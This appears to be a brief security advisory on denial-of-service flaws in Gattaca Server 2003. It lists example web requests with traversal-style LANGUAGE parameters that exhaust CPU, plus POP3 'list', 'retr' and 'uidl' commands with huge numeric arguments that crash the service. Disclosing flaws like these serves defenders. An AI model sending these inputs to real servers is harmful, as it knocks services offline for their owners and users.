|
Gattaca Server 2003 Multiple Denial Of Service Vulnerabilities
No exploit is required. Examples of URIs that may consume CPU resources: http://www.example.com/index.tmpl?HELPID=1000&TEMPLATE=skins//water&LANGUAGE=/ http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/../../../../ http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=. http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/ http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//[whatever]&LANGUAGE=lang//en Examples of POP3 commands sufficient to crash the application: list 99999999999999999999999 retr 99999999999999999999999 uidl 98409583490583409539405 |
|
|
Privacy Statement |
